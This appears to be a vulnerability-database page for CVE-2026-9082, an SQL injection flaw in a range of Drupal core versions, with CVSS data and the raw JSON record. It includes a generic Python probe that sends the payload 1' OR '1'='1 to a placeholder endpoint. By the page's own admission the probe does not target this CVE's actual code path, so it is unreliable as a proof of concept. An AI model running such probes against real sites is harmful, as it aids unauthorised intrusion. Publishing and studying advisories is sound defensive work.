Security Vulnerability Report
CVE-2026-9082 CVSS 6.5 MEDIUM


Published: 2026-05-20 20:16:41
Last Modified: 2026-05-20 20:16:41

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Drupal Drupal core allows SQL Injection. This issue affects Drupal core: from 8.9.0 before 10.4.10, from 10.5.0 before 10.5.10, from 10.6.0 before 10.6.9, from 11.0.0 before 11.1.10, from 11.2.0 before 11.2.12, from 11.3.0 before 11.3.10.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available for this record yet. Affected version ranges, taken from the description:

Drupal Core from 8.9.0 before 10.4.10
Drupal Core from 10.5.0 before 10.5.10
Drupal Core from 10.6.0 before 10.6.9
Drupal Core from 11.0.0 before 11.1.10
Drupal Core from 11.2.0 before 11.2.12
Drupal Core from 11.3.0 before 11.3.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Conceptual Proof of Concept for CVE-2026-9082
# This script demonstrates a potential SQL injection payload against a
# vulnerable Drupal endpoint. The endpoint and parameter are placeholders;
# the advisory on this page does not name the affected code path.

TARGET_URL = "http://example.com/drupal/vulnerable-endpoint"
PAYLOAD = "1' OR '1'='1"  # Basic SQL Injection test payload

headers = {
    "User-Agent": (
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
        "(KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    )
}

try:
    # Send request with the injection payload
    response = requests.get(
        TARGET_URL, params={"id": PAYLOAD}, headers=headers, timeout=10
    )

    # Check if the response indicates a successful injection or database error
    if (
        "syntax error" in response.text
        or "mysql_fetch" in response.text
        or response.status_code == 500
    ):
        print("[+] Potential SQL Injection vulnerability detected!")
    # Note: the payload above contains no delay clause, so this branch only
    # reports a slow response, not a confirmed time-based blind injection.
    elif response.elapsed.total_seconds() > 5:
        print("[+] Potential Time-Based Blind SQL Injection detected (significant delay).")
    else:
        print("[-] Vulnerability could not be confirmed with this payload.")
except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

References

https://www.drupal.org/sa-core-2026-004 (Drupal security advisory, as listed in the raw record below)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9082", "sourceIdentifier": "[email protected]", "published": "2026-05-20T20:16:41.230", "lastModified": "2026-05-20T20:16:41.230", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Drupal Drupal core allows SQL Injection.\n\nThis issue affects Drupal core: from 8.9.0 before 10.4.10, from 10.5.0 before 10.5.10, from 10.6.0 before 10.6.9, from 11.0.0 before 11.1.10, from 11.2.0 before 11.2.12, from 11.3.0 before 11.3.10."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.drupal.org/sa-core-2026-004", "source": "[email protected]"}]}}